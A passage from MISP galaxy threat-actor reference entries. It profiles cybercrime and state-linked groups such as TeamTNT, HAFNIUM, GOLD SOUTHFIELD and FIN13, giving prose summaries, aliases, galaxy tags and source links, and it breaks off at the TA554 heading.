In early Febuary, 2021 TeamTNT launched a new campaign against Docker and Kubernetes environments. Using a collection of container images that are hosted in Docker Hub, the attackers are targeting misconfigured docker daemons, Kubeflow dashboards, and Weave Scope, exploiting these environments in order to steal cloud credentials, open backdoors, mine cryptocurrency, and launch a worm that is looking for the next victim. They’re linked to the First Crypto-Mining Worm to Steal AWS Credentials and Hildegard Cryptojacking malware. TeamTNT is a relatively recent addition to a growing number of threats targeting the cloud. While they employ some of the same tactics as similar groups, TeamTNT stands out with their social media presence and penchant for self-promotion. Tweets from the TeamTNT’s account are in both English and German although it is unknown if they are located in Germany.

The tag is: misp-galaxy:threat-actor="TeamTNT"

TeamTNT is also known as:

  • Adept Libra

Table 12056. Table References

Links

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt

https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment

https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool

https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html

https://cyware.com/news/hildegard-teamtnts-new-feature-rich-malware-targeting-kubernetes-6587eb45

https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/

https://unit42.paloaltonetworks.com/atoms/adept-libra/

HAFNIUM

HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures. HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.In campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets’ environments. HAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.

The tag is: misp-galaxy:threat-actor="HAFNIUM"

HAFNIUM is also known as:

  • ATK233

  • G0125

  • Operation Exchange Marauder

  • Red Dev 13

  • Silk Typhoon

HAFNIUM has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="HAFNIUM" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:microsoft-activity-group="Silk Typhoon" with estimative-language:likelihood-probability="likely"

Table 12057. Table References

Links

https://attack.mitre.org/groups/G0125/

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

https://www.splunk.com/en_us/blog/security/detecting-hafnium-exchange-server-zero-day-activity-in-splunk.html

https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers

https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day

https://twitter.com/ESETresearch/status/1366862946488451088

https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html

https://us-cert.cisa.gov/ncas/alerts/aa21-062a

https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289

https://github.com/microsoft/CSS-Exchange/tree/main/Security

https://github.com/cert-lv/exchange_webshell_detection

https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits

https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021

https://pastebin.com/J4L3r2RS

https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Execution/exchange-iis-worker-dropping-webshell.md

https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server

https://www.nextron-systems.com/2021/03/06/scan-for-hafnium-exploitation-evidence-with-thor-lite

https://www.thedailybeast.com/how-chinas-devastating-microsoft-hack-puts-us-all-at-risk

https://www.rnz.co.nz/news/political/447239/government-points-finger-at-china-over-cyber-attacks

https://www.gov.uk/government/news/uk-and-allies-hold-chinese-state-responsible-for-a-pervasive-pattern-of-hacking

https://www.foreignminister.gov.au/minister/marise-payne/media-release/australia-joins-international-partners-attribution-malicious-cyber-activity-china

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

RedEcho

RedEcho: The group made heavy use of AXIOMATICASYMPTOTE — a term we use to track infrastructure that comprises ShadowPad C2s, which is shared between several Chinese threat activity groups

The tag is: misp-galaxy:threat-actor="RedEcho"

Table 12058. Table References

Links

https://www.recordedfuture.com/redecho-targeting-indian-power-sector/

https://therecord.media/redecho-group-parks-domains-after-public-exposure/

Ghostwriter

Ghostwriter is referred as an 'activity set', with various incidents tied together by overlapping behavioral characteristics and personas, rather than as an actor or group in itself.

The tag is: misp-galaxy:threat-actor="Ghostwriter"

Ghostwriter is also known as:

  • UNC1151

  • TA445

  • PUSHCHA

  • Storm-0257

  • DEV-0257

Ghostwriter has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Storm-0257" with estimative-language:likelihood-probability="likely"

Table 12059. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/07/ghostwriter-influence-campaign.html

https://twitter.com/hatr/status/1377220336597483520

https://www.mandiant.com/resources/unc1151-linked-to-belarus-government

https://www.bleepingcomputer.com/news/security/meta-ukrainian-officials-military-targeted-by-ghostwriter-hackers

https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag

https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/

TRAVELING SPIDER

Crowdstrike Tracks the criminal developer of Nemty ransomware as TRAVELING SPIDER. The actor has been observed to take advantage of single-factor authentication to gain access to victim organizations through Citrix Gateway and send extortion-related emails using the victim’s own Microsoft Office 365 instance.

The tag is: misp-galaxy:threat-actor="TRAVELING SPIDER"

Table 12061. Table References

Links

https://www.cyberscoop.com/coronavirus-hacking-disinformation-ransomware-spearphishing/

https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeServicesCyberFrontLines.pdf

MALLARD SPIDER

Crowdstrike tarcks the operators behind the Qbot as MALLARD SPIDER

The tag is: misp-galaxy:threat-actor="MALLARD SPIDER"

MALLARD SPIDER is also known as:

  • GOLD LAGOON

Table 12062. Table References

Links

https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/

http://www.secureworks.com/research/threat-profiles/gold-lagoon

RIDDLE SPIDER

According to Crowdstrike, RIDDLE SPIDER is the operator behind the avaddon ransomware

The tag is: misp-galaxy:threat-actor="RIDDLE SPIDER"

Table 12063. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

GOLD DUPONT

GOLD DUPONT is a financially motivated cybercriminal threat group that specializes in post-intrusion ransomware attacks using 777 (aka Defray777 or RansomExx) malware. Active since November 2018, GOLD DUPONT establishes initial access into victim networks using stolen credentials to remote access services like virtual desktop infrastructure (VDI) or virtual private networks (VPN). From October 2019 to early 2020 the group used GOLD BLACKBURN’s TrickBot malware as an initial access vector (IAV) during some intrusions. Since July 2020, the group has also used GOLD SWATHMORE’s IcedID (Bokbot) malware as an IAV in some intrusions.

The tag is: misp-galaxy:threat-actor="GOLD DUPONT"

GOLD DUPONT is also known as:

  • SPRITE SPIDER

Table 12064. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-dupont

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/

https://www.youtube.com/watch?v=qxPXxWMI2i4

SOLAR SPIDER

SOLAR SPIDER’s phishing campaigns deliver the JSOutProx RAT to financial institutions across Africa, the Middle East, South Asia and Southeast Asia.

The tag is: misp-galaxy:threat-actor="SOLAR SPIDER"

Table 12065. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

VIKING SPIDER

VIKING SPIDER is the criminal group behind the development and distribution of Ragnar Locker ransomware. While public reporting indicates the group began threatening to leak victim data in February 2020, a DLS was not observed until April 2020. The DLS is hosted on Tor, and similar to other actors, proof of data exfiltration is provided before the stolen data is fully leaked. It was also noted that On Dec. 22, 2020, a new post made to MountLocker ransomware’s Tor-hosted DLS was titled 'Cartel News' and included details of a victim of VIKING SPIDER’s Ragnar Locker

The tag is: misp-galaxy:threat-actor="VIKING SPIDER"

Table 12066. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/

https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

CIRCUS SPIDER

According to Crowdstrike, the NetWalker ransomware is being developed and maintained by a Russian-speaking actor designated as CIRCUS SPIDER. Initially discovered in September 2019and havinga compilation timestamp dating back to 28 August 2019, NetWalker has been found to be used in Big Game Hunting (BGH)-style operations while also being distributed via spam. CIRCUS SPIDER is advertising NetWalkeras being a closed-affiliate program,and verifies applicants before they are being accepted as an affiliate. The requirements rangefrom providing proof of previous revenue in similar affiliates programs, experience in the field and what type of industry the applicantis targeting.

The tag is: misp-galaxy:threat-actor="CIRCUS SPIDER"

Table 12067. Table References

Links

https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/

https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/

https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf

GOLD EVERGREEN

GOLD EVERGREEN was a financially motivated cybercriminal threat group that operated the Gameover Zeus (aka Mapp, P2P Zeus) botnet until June 2014. It encompasses an expansive and long running criminal conspiracy operated by a confederation of individuals calling themselves The Business Club from the mid 2000s until 2014. GOLD EVERGREEN’s technical operation was facilitated primarily through botnets using the Zeus, JabberZeus, and eventually Gameover Zeus malware families. These malware families were designed and maintained by a Russian national Evgeniy Bogachev (aka 'slavik') who was indicted by the U.S. DOJ in 2014 and remains a fugitive.

The tag is: misp-galaxy:threat-actor="GOLD EVERGREEN"

Table 12068. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-evergreen

https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group

BAMBOO SPIDER

Crowdstrike tracks the developer of Panda Zeus as BAMBOO SPIDER

The tag is: misp-galaxy:threat-actor="BAMBOO SPIDER"

Table 12069. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf

https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/

BOSON SPIDER

BOSON SPIDER is a cyber criminal group, which was first identified in 2015, recently and inexplicably went dark in the spring of 2016, appears to be a tightly knit group operating out of Eastern Europe. They have used a variety of distribution mechanisms such as the infamous (and now defunct) angler exploit kit, and obfuscated JavaScript to reduce the detection by antivirus solutions.

The tag is: misp-galaxy:threat-actor="BOSON SPIDER"

Table 12070. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf

https://www.crowdstrike.com/blog/ecrime-ecosystem/

OVERLORD SPIDER

OVERLORD SPIDER, aka The Dark Overlord. Similar to ransomware operators today, OVERLORD SPIDER likely purchased RDP access to compromised servers on underground forums in order to exfiltrate data from corporate networks. The actor was known to attempt to “sell back” the data to the respective victims, threatening to sell the data to interested parties should the victim refuse to pay. There was at least one identified instance of OVERLORD SPIDER successfully selling victim data on an underground market.

The tag is: misp-galaxy:threat-actor="OVERLORD SPIDER"

Table 12071. Table References

Links

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

OUTLAW SPIDER

On May 7, 2019, Mayor Bernard “Jack” Young confirmed that the network for the U.S. City of Baltimore (CoB) was infected with ransomware, which was announced via Twitter1. This infection was later confirmed to be conducted by OUTLAW SPIDER, which is the actor behind the RobbinHood ransomware. The actor demanded to be paid 3 BTC (approximately $17,600 USD at the time) per infected system, or 13 BTC (approximately $76,500 USD at the time) for all infected systems to recover the city’s files.

The tag is: misp-galaxy:threat-actor="OUTLAW SPIDER"

Table 12072. Table References

Links

https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeServicesCyberFrontLines.pdf

MIMIC SPIDER

MIMIC SPIDER is mentioned in two summary reports only

The tag is: misp-galaxy:threat-actor="MIMIC SPIDER"

Table 12073. Table References

Links

https://conferences.law.stanford.edu/cyberday/wp-content/uploads/sites/10/2016/10/2a_15GlobalThreatReport_Extracted.pdf

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

HOUND SPIDER

According to Crowdstrike, HOUND SPIDER affiliates arrested in Romania on December,2017

The tag is: misp-galaxy:threat-actor="HOUND SPIDER"

Table 12074. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf

GOLD BURLAP

GOLD BURLAP is a group of financially motivated criminals responsible for the development of the Pysa ransomware, also referred to as Mespinoza. Pysa is a cross-platform ransomware with known versions written in C++ and Python. As of December 2020, approximately 50 organizations had reportedly been targeted in Pysa ransomware attacks. The operators leverage 'name and shame' tactics to apply additional pressure to victims. As of January 2021, CTU researchers had found no Pysa advertisements on underground forums, which likely indicates that it is not operated as ransomware as a service (RaaS).

The tag is: misp-galaxy:threat-actor="GOLD BURLAP"

GOLD BURLAP is also known as:

  • CYBORG SPIDER

GOLD BURLAP has relationships with:

  • uses: misp-galaxy:malpedia="Mespinoza" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:malpedia="MimiKatz" with estimative-language:likelihood-probability="very-likely"

Table 12075. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-burlap

https://www.hhs.gov/sites/default/files/mespinoza-goldburlap-cyborgspider-analystnote-tlpwhite.pdf

GOLD CABIN

GOLD CABIN is a financially motivated cybercriminal threat group operating a malware distribution service on behalf of numerous customers since 2018. GOLD CABIN uses malicious documents, often contained in password-protected archives, delivered through email to download and execute payloads. The second-stage payloads are most frequently Gozi ISFB (Ursnif) or IcedID (Bokbot), sometimes using intermediary malware like Valak. GOLD CABIN infrastructure relies on artificial appearing and frequently changing URLs created with a domain generation algorithm (DGA). The URLs host a PHP object that returns the malware as a DLL file.

The tag is: misp-galaxy:threat-actor="GOLD CABIN"

GOLD CABIN is also known as:

  • Shakthak

  • TA551

  • ATK236

  • G0127

  • Monster Libra

Table 12076. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-cabin

https://attack.mitre.org/groups/G0127/

https://unit42.paloaltonetworks.com/atoms/monsterlibra/

GOLD FAIRFAX

GOLD FAIRFAX is a financially motivated cybercriminal threat group responsible for the creation, distribution, and operation of the Ramnit botnet. Ramnit, the phonetic spelling of RMNet, the internal name of the core module, began operation in April 2010 and became widespread in July 2010. A particularly virulent file-infecting component of early Ramnit variants that spreads by modifying executables and HTML files has resulted in the continued prevalence of those early variants. Currently, Ramnit remains an actively maintained and distributed threat. The intent of Ramnit is to intercept and manipulate online financial transactions through modification of web browser behavior ('man-in-the-browser').

The tag is: misp-galaxy:threat-actor="GOLD FAIRFAX"

Table 12077. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-fairfax

GOLD FLANDERS

GOLD FLANDERS is a financially motivated group responsible for distributed denial of service (DDOS) attacks linked to extortion emails demanding between 5 and 30 bitcoins. The attacks consist mostly of fragmented UDP packets (DNS and NTP reflection) as well as other traffic that can vary per victim. The arrival of the extortion email is timed to coincide with a DDOS attack consisting of traffic between 20 Gbps and 200 Gbps and 12-15 million packets per second, lasting between 20 and 70 minutes targeted at a particular Autonomous System Number (ASN) or group of IP addresses. In some cases victim organisations have replied to these extortion emails and received personal replies from GOLD FLANDERS operators within 20 minutes.

The tag is: misp-galaxy:threat-actor="GOLD FLANDERS"

Table 12078. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-flanders

GOLD GALLEON

GOLD GALLEON is a financially motivated cybercriminal threat group comprised of at least 20 criminal associates that collectively carry out business email compromise (BEC) and spoofing (BES) campaigns. The group appears to specifically target maritime organizations and their customers. CTU researchers have observed GOLD GALLEON targeting firms in South Korea, Japan, Singapore, Philippines, Norway, U.S., Egypt, Saudi Arabia, and Colombia. The threat actors leverage tools, tactics, and procedures that are similar to those used by other BEC/BES groups CTU researchers have previously investigated, such as GOLD SKYLINE. The groups have used the same caliber of publicly available malware (inexpensive and commodity remote access trojans), crypters, and email lures.

The tag is: misp-galaxy:threat-actor="GOLD GALLEON"

Table 12079. Table References

Links

https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry

http://www.secureworks.com/research/threat-profiles/gold-galleon

GOLD GARDEN

GOLD GARDEN was a financially motivated cybercriminal threat group that authored and operated the GandCrab ransomware from January 2018 through May 2019. GandCrab was operated as a ransomware-as-a-service operation whereby numerous affiliates distributed the malware and split ransom payments with the core operators. GOLD GARDEN maintained exclusive control of the development of GandCrab and associated command and control (C2) infrastructure. Individual affiliates, of which there were frequently more than a dozen in operation simultaneously, coordinated the distribution of GandCrab through spam emails, web exploit kits, pay-per-install botnets, and scan-and-exploit style attacks. On May 31, 2019 the operators announced they have halted operations with no intent to resume for unknown reasons. In April 2019 the operators of GOLD GARDEN transferred the source code of GandCrab to GOLD SOUTHFIELD who used it as the foundation of the REvil ransomware operation. GOLD SOUTHFIELD operates a similar affiliate program comprised largely of former GandCrab users and other groups recruited from underground forums.

The tag is: misp-galaxy:threat-actor="GOLD GARDEN"

Table 12080. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-garden

GOLD MANSARD

GOLD MANSARD is a financially motivated cybercriminal threat group that operated the Nemty ransomware from August 2019. The threat actor behind Nemty is known on Russian underground forums as 'jsworm'. Nemty was operated as a ransomware as a service (RaaS) affiliate program and featured a 'name and shame' website where exfiltrated victim data was leaked. In April 2020, jsworm appeared to acquire new partners and retired the Nemty ransomware. This was followed by the introduction of Nefilim ransomware, which does not operate as an affiliate model. Nefilim has been used in post-intrusion ransomware attacks against organizations in logistics, telecommunications, energy and other sectors.

The tag is: misp-galaxy:threat-actor="GOLD MANSARD"

Table 12081. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-mansard

GOLD NORTHFIELD

Operational since at least October 2020, GOLD NORTHFIELD is a financially motivated cybercriminal threat group that leverages GOLD SOUTHFIELD’s REvil ransomware in their attacks. To do this, the threat actors replace the configuration of the REvil ransomware binary with their own in an effort to repurpose the ransomware for their operations. GOLD NORTHFIELD has given this modified REvil ransomware variant the name 'LV ransomware'.

The tag is: misp-galaxy:threat-actor="GOLD NORTHFIELD"

Table 12082. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-northfield

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-13th-2020-extortion-gone-wild/

GOLD RIVERVIEW

GOLD RIVERVIEW was a financially motivated cybercriminal group that facilitated the distribution of malware- and scam-laden spam email on behalf of its customers. This threat group authored and sold the Necurs rootkit beginning in early 2014, including to GOLD EVERGREEN who integrated it into Gameover Zeus. GOLD RIVERVIEW also operated a global botnet that was colloquially known as Necurs (CraP2P) and was a major source of spam email from 2016 through 2018. Necurs distributed malware such as GOLD DRAKE’s Dridex (Bugat v5), GOLD BLACKBURN’s TrickBot, and other families like Locky and FlawedAmmy. Necurs also distributed a large volume of email pushing securities 'pump and dump' scams, rogue pharmacies, and fraudulent dating sites. On March 4, 2019 all three active segments of the Necurs botnet ceased operation and have not since resumed. On March 10, 2020 Microsoft took civil action against GOLD RIVERVIEW and made technical steps that would complicate the threat actors' ability to reconstitute the botnet.

The tag is: misp-galaxy:threat-actor="GOLD RIVERVIEW"

Table 12083. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-riverview

GOLD SKYLINE

GOLD SKYLINE is a financially motivated cybercriminal threat group operating from Nigeria engaged in high-value wire fraud facilitated by business email compromise (BEC) and spoofing (BES). Also known as Wire-Wire Group 1 (WWG1), GOLD SKYLINE has been active since at least 2016 and relies heavily on compromised email accounts, social engineering, and increasingly malware to divert inter-organization funds transfers.

The tag is: misp-galaxy:threat-actor="GOLD SKYLINE"

Table 12084. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-skyline

GOLD SOUTHFIELD

GOLD SOUTHFIELD is a financially motivated cybercriminal threat group that authors and operates the REvil (aka Sodinokibi) ransomware on behalf of various affiliated threat groups. Operational since April 2019, the group obtained the GandCrab source code from GOLD GARDEN, the operators of GandCrab that voluntarily withdrew their ransomware from underground markets in May 2019. GOLD SOUTHFIELD is responsible for authoring REvil and operating the backend infrastructure used by affiliates (also called partners) to create malware builds and to collect ransom payments from victims. CTU researchers assess with high confidence that GOLD SOUTHFIELD is a former GandCrab affiliate and continues to work with other former GandCrab affiliates.

The tag is: misp-galaxy:threat-actor="GOLD SOUTHFIELD"

Table 12085. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-southfield

https://www.secureworks.com/research/revil-sodinokibi-ransomware

https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic

https://www.secureworks.com/blog/revil-the-gandcrab-connection

GOLD SYMPHONY

GOLD SYMPHONY is a financially motivated cybercrime group, likely based in Russia, that is responsible for the development and sale on underground forums of the Buer Loader malware. First discovered around August 2019, Buer Loader is offered as a malware-as-a-service (MasS) and has been advertised by a threat actor using the handle 'memeos'. Customers include GOLD BLACKBURN, the operators of the TrickBot malware. In addition to TrickBot, Buer Loader has been reported to download Cobalt Strike and other tools for use in post-intrusion ransomware attacks.

The tag is: misp-galaxy:threat-actor="GOLD SYMPHONY"

Table 12086. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-symphony

GOLD WATERFALL

GOLD WATERFALL is a group of financially motivated cybercriminals responsible for the creation, distribution, and operation of the Darkside ransomware. Active since August 2020, GOLD WATERFALL uses a variety of tactics, techniques, and procedures (TTPs) to infiltrate and move laterally within targeted organizations to deploy Darkside ransomware to its most valuable resources. Among these TTPs are using malicious documents delivered by email to establish a foothold and using stolen credentials to access victims' remote access services. In November 2020, the 'darksupp' persona was observed advertising an affiliate program on several semi-exclusive underground forums, marking GOLD WATERFALL’s entry into the ransomware-as-a-service (RaaS) landscape.

The tag is: misp-galaxy:threat-actor="GOLD WATERFALL"

Table 12087. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-waterfall

https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access

GOLD WINTER

GOLD WINTER are a financially motivated group, likely based in Russia, who operate the Hades ransomware. Hades activity was first identified in December 2020 and its lack of presence on underground forums and marketplaces leads CTU researchers to conclude that it is not operated under a ransomware as a service affiliate model. GOLD WINTER do employ name-and-shame tactics, where data is stolen and used as additional leverage over victims, but rather than a single centralized leak site CTU researchers have observed the group using Tor sites customized for each victim that include a Tox chat ID for communication, which also appears to be unique for each victim.

The tag is: misp-galaxy:threat-actor="GOLD WINTER"

Table 12088. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-winter

BackdoorDiplomacy

An APT group that we are calling BackdoorDiplomacy, due to the main vertical of its victims, has been targeting Ministries of Foreign Affairs and telecommunication companies in Africa and the Middle East since at least 2017.

The tag is: misp-galaxy:threat-actor="BackdoorDiplomacy"

BackdoorDiplomacy is also known as:

  • BackDip

  • CloudComputating

  • Quarian

Table 12089. Table References

Links

https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

Gelsemium

The Gelsemium group has been active since at least 2014 and was described in the past by a few security companies. Gelsemium’s name comes from one possible translation ESET found while reading a report from VenusTech who dubbed the group 狼毒草 for the first time. It’s the name of a genus of flowering plants belonging to the family Gelsemiaceae, Gelsemium elegans is the species that contains toxic compounds like Gelsemine, Gelsenicine and Gelsevirine, which ESET choses as names for the three components of this malware family.

The tag is: misp-galaxy:threat-actor="Gelsemium"

Gelsemium is also known as:

  • 狼毒草

Table 12090. Table References

Links

https://www.welivesecurity.com/2021/06/09/gelsemium-when-threat-actors-go-gardening/

https://www.venustech.com.cn/uploads/2018/08/231401512426.pdf

https://hitcon.org/2016/pacific/0composition/pdf/1202/1202%20R0%200930%20an%20intelligance-driven%20approach%20to%20cyber%20defense.pdf

https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf

BelialDemon

Mentioned as operator of TriumphLoader and Matanbuchus

The tag is: misp-galaxy:threat-actor="BelialDemon"

BelialDemon is also known as:

  • Matanbuchus

Table 12091. Table References

Links

https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/

Common Raven

Threat actor Common Raven has been actively targeting financial sector institutions, compromising their SWIFT payment infrastructure to send out fraudulent payments.

The tag is: misp-galaxy:threat-actor="Common Raven"

Common Raven is also known as:

  • OPERA1ER

  • NXSMS

  • DESKTOP-GROUP

Table 12092. Table References

Links

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-common-raven-iocs

https://www2.swift.com/isac/report/10118

https://blog.group-ib.com/opera1er-apt

FIN13

Since 2017, Mandiant has been tracking FIN13, an industrious and versatile financially motivated threat actor conducting long-term intrusions in Mexico with an activity timeframe stretching back as early as 2016. Although their operations continue through the present day, in many ways FIN13’s intrusions are like a time capsule of traditional financial cybercrime from days past. Instead of today’s prevalent smash-and-grab ransomware groups, FIN13 takes their time to gather information to perform fraudulent money transfers. Rather than relying heavily on attack frameworks such as Cobalt Strike, the majority of FIN13 intrusions involve heavy use of custom passive backdoors and tools to lurk in environments for the long haul.

The tag is: misp-galaxy:threat-actor="FIN13"

FIN13 is also known as:

  • TG2003

  • Elephant Beetle

Table 12093. Table References

Links

https://www.mandiant.com/resources/fin13-cybercriminal-mexico

https://blog.sygnia.co/elephant-beetle-an-organized-financial-theft-operation

https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf

https://www.netwitness.com/wp-content/uploads/FIN13-Elephant-Beetle-NetWitness.pdf

SideCopy

The SideCopy APT is a Pakistani threat actor that has been operating since at least 2019, mainly targeting South Asian countries and more specifically India and Afghanistan. Its name comes from its infection chain that tries to mimic that of the SideWinder APT. It has been reported that this actor has similarities with Transparent Tribe (APT36) and possibly is a subdivision of this actor. Cisco Talos and Seqrite have provided comprehensive reports on this actor’s activities.

The tag is: misp-galaxy:threat-actor="SideCopy"

Table 12094. Table References

Links

https://www.seqrite.com/blog/operation-sidecopy/

https://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/

https://www.telsy.com/sidecopy-apt-from-windows-to-nix/

https://blog.talosintelligence.com/2021/07/sidecopy.html

https://about.fb.com/news/2021/11/taking-action-against-hackers-in-pakistan-and-syria/

https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d

Antlion

Antlion is a Chinese state-backed advanced persistent threat (APT) group, who has been targeting financial institutions in Taiwan. This persistent campaign has lasted over the course of at least 18 months.

The tag is: misp-galaxy:threat-actor="Antlion"

Table 12095. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks

TA2541

Persistent cybercrime threat actor targeting aviation, aerospace, transportation, manufacturing, and defense industries for years. This threat actor consistently uses remote access trojans (RATs) that can be used to remotely control compromised machines. This threat actor uses consistent themes related to aviation, transportation, and travel. The threat actor has used similar themes and targeting since 2017.

The tag is: misp-galaxy:threat-actor="TA2541"

Table 12096. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight

TA516

This actor typically distributes instances of the SmokeLoader intermediate downloader, which, in turn, downloads additional malware of the actor’s choice — often banking Trojans. Figure 3 shows a lure document from a November campaign in which TA516 distributed fake resumes with malicious macros that, if enabled, launch a PowerShell script that downloads SmokeLoader. In this instance, we observed SmokeLoader downloading a Monero coinminer. Since the middle of 2017, TA516 has used similar macro-laden documents as well as malicious JavaScript hosted on Google Drive to distribute both Panda Banker and a coinminer executable via SmokeLoader, often in the same campaigns.

The tag is: misp-galaxy:threat-actor="TA516"

Table 12097. Table References

Links

https://www.thaicert.or.th/downloads/files/Threat_Group_Cards_v2.0.pdf

TA547

TA547 is responsible for many other campaigns since at least November 2017. The other campaigns by the actor were often localized to countries such as Australia, Germany, the United Kingdom, and Italy. Delivered malware included ZLoader (a.k.a. Terdot), Gootkit, Ursnif, Corebot, Panda Banker, Atmos, Mazar Bot, and Red Alert Android malware.

The tag is: misp-galaxy:threat-actor="TA547"

Table 12098. Table References

Links

https://www.thaicert.or.th/downloads/files/Threat_Group_Cards_v2.0.pdf

TA554

